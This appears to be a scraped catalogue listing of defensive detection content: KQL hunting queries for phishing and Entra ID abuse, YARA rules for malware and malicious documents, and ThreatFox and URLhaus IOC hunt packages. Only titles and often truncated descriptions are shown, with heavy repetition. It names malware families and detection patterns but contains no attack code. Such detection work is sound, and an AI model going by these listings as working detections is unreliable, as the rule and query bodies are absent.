Admin Submissions by Submission Type (FN)
kql medium
T1566
CloudAppEvents
This query helps reviewing admin reported email submissions
Admin Submissions by Submission Type (FP)
kql medium
T1566
CloudAppEvents
This query visualises the total amount of admin false positive submission by submission type.
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX
Ham backdoor
yara low
YARA rule: Ham_backdoor
Impersonation Detections Trend
kql medium
T1566
EmailEvents
This query visualises total emails with Phish (BEC) - Impersonation detections over time.
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
The YARA rule 'PLUGX_RedLeaves' detects specific RedLeaves and PlugX malware binaries associated with advanced persistent threat campaigns. SOC teams should deploy
The YARA rule 'RED
Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT
Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT
referral-phish-emails
kql medium
T1566
EmailEventsEmailUrlInfo
Hunting for credential phishing using the "Referral" infrastructure using Defender for Office 365 data
T1566
EmailEvents
This query helps reviewing count of spoof and impersonation detections done per sender IP
Spoof and impersonation phish detections
kql medium
T1566
EmailEvents
This query helps reviewing count of phish detections done by spoof detection methods
Spoof Detections by Detection Technology
kql medium
T1566
EmailEvents
This query visualises total emails with Phish (BEC) Spoof detections by Detection Technology
T1566
EmailEvents
This query visualises total emails with Phish (BEC) Spoof detections by Detection Technology over time
Spoof Detections Trend
kql medium
T1566
EmailEvents
This query visualises total emails Business Email Compromise (BEC) Spoofing detections over time summarizing the data daily.
Status of submissions
kql medium
T1566
CloudAppEvents
This query helps reviewing status of submissions
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Kimwolf
ThreatFox: PerlBot IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with PerlBot
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 6 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DeviceFileEventsDnsEvents
Hunt package for 39 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DeviceFileEventsDnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with KongTuke
ThreatFox: magecart IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with magecart
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 21 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with Unknown Loader
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 43 IOCs associated with Cobalt Strike
ThreatFox: DanaBot IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DanaBot
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEvents
The Remus malware family is designed to exfiltrate sensitive data and establish persistence within compromised systems, often
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Sliver
ThreatFox: SmokeLoader IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 3 IOCs associated with SmokeLoader
ThreatFox: Tofsee IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Tofsee
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 46 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with VShell
Tofu Backdoor
yara low
The T
T1566
CloudAppEvents
This query visualises emails submitted as false negatives by admins where emails where already detected by MDO but there was an admin policy override
T1566
CloudAppEvents
This query visualises emails submitted by admins as false negatives, summarizing the data by top 10 sender domains of those emails
T1566
CloudAppEvents
This query visualises emails submitted by admins as false positives, summarizing the data by top 10 sender domains of those emails
T1566
CloudAppEvents
This query visualises the top admins performing false negative submissions
T1566
CloudAppEvents
This query visualises the top admins performing false positive submissions
Top accounts performing user submissions
kql medium
T1566
CloudAppEvents
This query graphs top accounts performing user submissions
T1566
EmailEvents
This query visualises top outbound recipient domains by outbound email volume and shows total number of inbound emails with Threats from the same domains (as inbound senders)
Total Submissions by Submission State
kql medium
T1566
CloudAppEvents
Total Submissions by Submission State
Total Submissions by Submission Type
kql medium
T1566
CloudAppEvents
Total Submissions by Submission Type
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 27 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as arm
URLhaus: c2-monitor-auto Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as c2-monitor-auto
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as ClearFake
URLhaus: CoinMiner Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as CoinMiner
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as elf
URLhaus: jar Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as jar
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 37 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as Mozi
URLhaus: WeedHack Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as WeedHack
User Email Submission Trend (FN)
kql medium
T1566
CloudAppEvents
This query visualises the daily ammount of users false negative submission by submission type, including phish simulations reported by users.
T1566
CloudAppEvents
This query visualises user submissions type compared to admin review verdict
T1566
CloudAppEvents
This query visualises user submissions where admin also performed 'mark and notify' action on the submission
T1566
CloudAppEvents
This query visualises the total ammount of user false negative submission by submission type, including the phish simulations reported emails
T1566
CloudAppEvents
This query visualises the total ammount of user false negative or false positive submissions by the verdict of the submission grading.
User email submissions (FN) from Junk Folder
kql medium
T1566
CloudAppEventsEmailEvents
This query visualises the total ammount of user false negative submissions from the junk folder
T1566
CloudAppEventsEmailEvents
This query visualises emails submitted as false negatives by users where emails were already detected by MDO but there was an admin definded policy override
T1566
CloudAppEventsEmailEvents
This query visualises emails submitted as false negatives by users where emails were already detected by MDO but there was a policy override.
T1566
CloudAppEventsEmailEvents
This query visualises top sender email addresses of inbound emails submitted as false negatives by users.
T1566
CloudAppEventsEmailEvents
This query visualises top sender domains of inbound emails submitted as false negatives by users.
T1566
CloudAppEventsEmailEvents
This query visualises top sender email addresses of intra-org emails submitted as false negatives by users.
T1566
CloudAppEventsEmailEvents
This query visualises top 10 subjects of intra-org emails submitted as false negatives by users.
T1566
EmailEventsIdentityInfo
This query helps to find threats using display name impersonation for users not already protected with User Impersonation
AIR investigation actions insight
kql medium
T1566
CloudAppEvents
This query provides insights into AIR investigation actions in Microsoft Defender for Office 365.
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
Bulk Emails by Sender Bulk Complaint level
kql medium
T1566
EmailEvents
This query visualises total inbound emails which has any Bulk complaint level.
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
Campaign with randomly named attachments
kql medium
T1566
EmailAttachmentInfo
In this detection,we hunt for emails with randomly named attachment names from the same sender to multiple recipients
Campaign with suspicious keywords
kql medium
T1566
EmailEvents
In this detection, we track emails with suspicious keywords in subjects.
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
T1566
EmailEventsEmailUrlInfo
In this detection, we check the sender prevalence over the last 14 days and use the same to detect malicious activity via email containing QR code
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
Display Name - Spoof and Impersonation
kql medium
T1566
EmailEvents
This query helps reviewing incoming email messages where the Display Name of the sender contains own or other partner company/brand name
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
Email Top 10 Domains sending Spam
kql medium
T1566
EmailEvents
This query visualises total inbound emails with Spam detections.
Email Top 10 Targeted Users (Spam)
kql medium
T1566
EmailEvents
This query visualises top 10 users targeted with Spam.
T1566
EmailEvents
This query visualises total inbound emails with Spam detections summarizing the data by the top 15 email sender P2 domain (SenderFromDomain).
T1566
EmailEvents
This query visualises top 15 users targeted with Spam with summarized spam detections.
Emails delivered having URLs from QR codes
kql medium
T1566
EmailEventsEmailUrlInfo
In this query, we hunt for inbound emails delivered having URLs from QR codes
T1566
EmailEventsEmailUrlInfo
In this query, we hunt for inbound emails having URLs from QR codes and suspicious keywords in subject
T1566
EmailEventsEmailUrlInfo
In this query, we hunt for inbound emails having URLs from QR codes and send by non-prevalent senders
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
Group quarantine release
kql medium
T1566
CloudAppEventsEmailEvents
This query helps in reviewing group Quarantine released messages by detection type. Useful to see what is leading to the largest number of messages being released.
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
High Confidence Phish Released
kql medium
T1566
CloudAppEventsEmailEvents
This query shows information about high confidence phish email that has been released from the Quarantine.
Hunting for sender patterns
kql medium
T1566
EmailAttachmentInfoEmailEvents
In this detection approach, we correlate email from non-prevalent senders in the organization with impersonation intents
Hunting for user signals-clusters
kql medium
T1566
EmailEvents
In this detection,we use Email reported by user as malware or phish MDO alert as a starting point to identify the scope of a campaign.
T1566
EmailEvents
This query visualises total emails with Phish (BEC) Impersonation detections by Detection Technology
T1566
EmailEvents
This query visualises total emails with Phish (BEC) Impersonation detections by Detection Technology over time
Inbound emails with QR code URLs
kql medium
T1566
EmailEventsEmailUrlInfo
In this query, we summarize volume of inbound emails with QR code URLs in last 30 days
is elf
yara low
YARA rule: is__elf
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
T1566
EmailEvents
Listing Email Remediation Actions performed via Explorer in Defender for Office 365
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
T1566
EmailEvents
In this detection, we track emails with personalized subjects.
T1566
EmailEvents
In this detection, we track emails with personalized subjects.
Quarantine Phish Reason
kql medium
T1566
EmailEvents
This query visualises the total amount of phish emails that are quarantined, summarized by the detection method
Quarantine Phish Reason trend
kql medium
T1566
EmailEvents
This query visualises the amount of phish emails that are quarantined, summarized daily by the detection method
Quarantine Release Email Details
kql medium
T1566
CloudAppEventsEmailEvents
This query shows information about email that has been released from the Quarantine in Defender for Office 365.
Quarantine release trend
kql medium
T1566
CloudAppEvents
This query helps reviewing quarantine release trend in Defender for Office 365
Quarantine releases by Detection Types
kql medium
T1566
EmailEvents
This query visualises emails released from quarantine and summarizing the result by the original filter verdict
Quarantine Spam Reason
kql medium
T1566
EmailEvents
This query visualises the total amount of spam emails that are quarantined, summarized by the detection method
Quarantine Spam Reason trend
kql medium
T1566
EmailEvents
This query visualises the amount of spam emails that are quarantined, summarized daily by the detection method
T1566
In this detection,we hunt for any sign-in attempt from a non-managed, non-compliant, untrusted device.
identifies RTF's with potential shellcode
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
Spam detection by delivery location
kql medium
T1566
EmailEvents
This query visualises total emails with Spam detections over time summarizing the data daily by Delivery Location.
Spam detection by IP and its location
kql medium
T1566
EmailEvents
This query visualises total emails with Spam detections summarizing the data by email sender IP address (SenderIPv4, SenderIPv6).
Spam detection technologies
kql medium
T1566
EmailEvents
This query visualises total emails with Spam detections summarizing the data by various Spam detection technologies/controls.
Spam detection trend
kql medium
T1566
EmailEvents
This query visualises total emails with Spam detections over time summarizing the data daily
Spam Detections by Detection technology
kql medium
T1566
EmailEvents
This query visualises total emails with Spam detections over time by various Spam Detection technologies/controls.
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
T1566
CloudAppEvents
This detection approach correlates a user accessing an email with image/document attachments and a risky sign-in attempt from non-trusted devices.
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Kimwolf
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Mirai is a DDoS botnet malware that infects IoT devices to launch
ThreatFox: PerlBot IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with PerlBot
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 8 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 6 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 22 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 2 IOCs associated with Unknown malware
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 37 IOCs associated with Cobalt Strike
ThreatFox: CobaltMirage FRP IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 10 IOCs associated with CobaltMirage FRP
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
DCRat is a remote access trojan that enables attackers to exfiltrate data and
ThreatFox: Lumar IOCs
ioc-hunt high
DnsEvents
Hunt package for 6 IOCs associated with Lumar
ThreatFox: Remus IOCs
ioc-hunt high
DnsEvents
Hunt package for 5 IOCs associated with Remus
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with SectopRAT
ThreatFox: Stealc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 2 IOCs associated with Stealc
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 8 IOCs associated with StrelaStealer
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEvents
Hunt package for 19 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 82 IOCs associated with VShell
Top 10 domains sending Bulk email
kql medium
T1566
EmailEvents
This query visualises total inbound emails which has any Bulk complaint level.
Top Users receiving Phish
kql medium
T1566
EmailEvents
This query visualises total inbound emails with Phish detections summarizing the data by the top recipient email address (RecipientEmailAddress)
CommentCrew-threat-apt1
yara low
CommentCrew-threat-apt1
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 37 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 17 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 19 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 25 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as Mozi
URLhaus: unknown Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as unknown
Zero-day Phish Detections Trend
kql medium
T1566
EmailEvents
This query visualises total emails with Phish detections over time summarizing the data daily by Phish detection technologies/controls used for detecting unknown-unique phish
Admin consent granted to application
kql medium
T1528T1098
AuditLogs
Hunting query that identifies admin consent grants to Entra ID applications. Admin consent (also referred to as tenant-wide consent) allows an administrator to authorize an application to access resou
T1528
AuditLogs
Hunting query that identifies Entra ID application registrations and updates where one or more redirect URIs (reply URLs) point to an external domain that is not a trusted Microsoft endpoint, localhos
Appspot Phishing Abuse
kql medium
T1566
EmailEventsEmailUrlInfo
This query helps surface phishing campaigns associated with Appspot abuse.
T1562.001T1556
AuditLogs
Hunting query that identifies Conditional Access policies that have been disabled or deleted. An attacker who obtains privileged access to an Entra ID tenant will commonly disable or delete CA policie
Email Top Domains sending Phish
kql medium
T1566
EmailEvents
This query visualises total inbound emails with Phish detections summarizing the data by the top email sender P2 domain (SenderFromDomain).
Detects an embedded executable in a non-executable file
yara critical
Detects an embedded executable in a non-executable file
T1098.003
AuditLogs
Hunting query that identifies guest or external accounts being added to privileged Entra ID directory roles. External accounts are identified by the presence of #EXT# in the UserPrincipalName, which i
hancitor dropper
yara low
YARA rule: hancitor_dropper
macrocheck
yara low
YARA rule: macrocheck
maldoc API hashing
yara low
The 'maldoc
maldoc find kernel32 base method 1
yara low
YARA rule: maldoc_find_kernel32_base_method_1
maldoc find kernel32 base method 2
yara low
YARA rule: maldoc_find_kernel32_base_method_2
maldoc find kernel32 base method 3
yara low
YARA rule: maldoc_find_kernel32_base_method_3
maldoc function prolog signature
yara low
The 'maldoc_function_prolog_signature' rule detects malicious document code patterns associated with malware function prologs. SOC teams should deploy this rule in endpoint EDR scanning, email gateways, and file share monitoring to
maldoc getEIP method 1
yara low
YARA rule: maldoc_getEIP_method_1
maldoc getEIP method 4
yara low
YARA rule: maldoc_getEIP_method_4
maldoc indirect function call 1
yara low
YARA rule: maldoc_indirect_function_call_1
maldoc indirect function call 2
yara low
YARA rule: maldoc_indirect_function_call_2
maldoc indirect function call 3
yara low
YARA rule: maldoc_indirect_function_call_3
maldoc structured exception handling
yara low
YARA rule: maldoc_structured_exception_handling
maldoc suspicious strings
yara low
YARA rule: maldoc_suspicious_strings
Detect weaponized RTF documents with OLE2Link exploit
MWI generated document
yara low
MWI generated document
T1528
AuditLogs
Hunting query that identifies OAuth consent events where the granted permission scope includes high-risk delegated or application permissions, and where the target application has not been observed in
Phish Detections by delivery location trend
kql medium
T1566
EmailEvents
This query visualises total emails with Phish detections over time summarizing the data daily by Delivery Location.
Phish Detections by Detection technology
kql medium
T1566
EmailEvents
This query visualises total emails with Phish detections summarizing the data by various Phish detection technologies/controls
T1566
EmailEvents
This query visualises total emails with Phish detections over time summarizing the data daily by various Phish Detection technologies/controls
Phish Detections (High) by delivery location
kql medium
T1566
EmailEvents
This query visualises emails with Phish detections (High confidence) summarizing the data by Delivery Location.
T1566
EmailEvents
This query visualises emails with Phish detections (Normal confidence) summarizing the data by Delivery Location.
Phish Detections Trend
kql medium
T1566
EmailEvents
This query visualises total emails with Phish detections over time summarizing the data daily.
Possible device code phishing attempts
kql medium
T1566
UrlClickEvents
This query helps hunting for possible device code Phishing attempts
Punycode lookalikes
kql medium
T1566
EmailEventsEmailUrlInfo
Punycode lookalike domains in Emails and Teams messages
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 46 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Unknown malware
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Cobalt Strike is a sophisticated malware used for persistent remote access, command-and-control (C2) communication, and executing payloads to exfiltrate data or move laterally within
ThreatFox: Formbook IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Formbook
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Havoc
ThreatFox: Loki Password Stealer (PWS) IOCs
ioc-hunt high
UrlClickEvents
The Loki Password Stealer (PWS) is a malware family designed to exfiltrate sensitive credentials and system data by leveraging stolen
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with NetSupportManager RAT
ThreatFox: NjRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with NjRAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Remcos
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 110 IOCs associated with Vidar
Top policies performing user overrides
kql medium
T1566
EmailEvents
This query helps in reviewing top policies for user overrides (Allow/Block)
Total Emails with Admin Overrides (Allow)
kql medium
T1566
EmailEvents
This query visualises the total amount of emails subject to an admin policy with action of allow, independent of action taken, summarizing the data by type of override
Total Emails with Admin Overrides (Block)
kql medium
T1566
EmailEvents
This query visualises the amount of emails subject to an admin policy with action of block, summarizing the data daily
Total Emails with User Overrides (Allow)
kql medium
T1566
EmailEvents
This query visualises the amount of emails subject to a user type policy with action of allow, summarizing the data by type of override and threats type found
Total Emails with User Overrides (Block)
kql medium
T1566
EmailEvents
This query visualises the amount of emails subject to a user type policy with action of block, summarizing the data daily
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 55 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 33 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as Mozi
BlackHole v2
yara low
YARA rule: BlackHole_v2
Detect a VBE file inside a byte sequence
Dridex Malware in XML Document
yara low
Dridex Malware in XML Document
EmbeddedFiles were introduced in v1.3
Flate was introduced in v1.2
yara low
Flate was introduced in v1.2
3.4.1, 'File Header' of Appendix H states that ' Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.' Therefore, if you see this trigger then any ot
invalid trailer structure
yara low
YARA rule: invalid_trailer_structure
XObject's require v1.4+
yara low
XObject's require v1.4+
The first entry in a cross-reference table is always free and has a generation number of 65,535
yara low
The first entry in a cross-reference table is always free and has a generation number of 65,535
JBIG2 was introduced in v1.4
yara low
JBIG2 was introduced in v1.4
These are commonly used to split up JS code
JavaScript was introduced in v1.3
yara low
JavaScript was introduced in v1.3
malicious author
yara low
The 'malicious_author' YARA rule detects files or artifacts associated with Glenn Edwards' known malicious campaigns, targeting indicators of compromise linked to his threat actor tactics. SOC teams should deploy this rule in endpoint EDR scanning, email gateways, and file share monitoring to identify and mitigate potential threats from this adversary.
multiple filtering
yara low
The 'multiple_filtering' YARA rule detects malware or payloads employing multiple filtering techniques to evade detection mechanisms. SOC teams should deploy this rule in endpoint EDR scanning, email gate
Written very generically and doesn't hold any weight - just something that might be useful to know about to help show incremental updates to the file being analyzed
PDF Embedded Exe
yara low
YARA rule: PDF_Embedded_Exe
possible exploit
yara low
The 'possible_exploit' YARA rule detects potential malicious code or exploit artifacts commonly associated with advanced threats. SOC teams should deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify and mitigate exploit-related activities.
powershell
yara low
This YARA rule detects malicious PowerShell scripts commonly used in cyberattacks. SOC teams should deploy it in endpoint EDR scanning, email gateway, and file share monitoring to identify and block suspicious PowerShell activity.
ppaction
yara low
YARA rule: ppaction
The 'shellcode_blob_metadata' rule detects large Base64-encoded blobs in metadata fields, which are often indicative of embedded shellcode awaiting decoding. SOC teams should deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify potential malicious payloads.
T1566
EmailEvents
This query helps in reviewing malicious emails allowed due to admin overrides
T1566
EmailEvents
This query helps in reviewing malicious emails allowed due to user overrides
suspicious author
yara low
YARA rule: suspicious_author
suspicious creation
yara low
YARA rule: suspicious_creation
suspicious creator
yara low
YARA rule: suspicious_creator
suspicious embed
yara low
YARA rule: suspicious_embed
suspicious js
yara low
YARA rule: suspicious_js
suspicious launch action
yara low
YARA rule: suspicious_launch_action
suspicious obfuscation
yara low
The 'suspicious_obfuscation' rule detects obfuscated code or files that may hide malicious payloads, often used in evasion techniques. SOC teams should deploy this rule in endpoint EDR scanning, email gateway analysis, and file share monitoring to identify potential threats.
suspicious producer
yara low
YARA rule: suspicious_producer
Suspicious Teams Display Name
kql medium
T1566
This query looks for Teams messages from an external user with a suspicious display name.
suspicious title
yara low
YARA rule: suspicious_title
suspicious version
yara low
The 'suspicious_version' YARA rule detects files with known malicious versions or variants associated with malware families. SOC teams
T1562
CloudAppEvents
This query visualises the daily amount of admin false negative Teams message submissions by submission type of Phish or Malware
T1562
CloudAppEvents
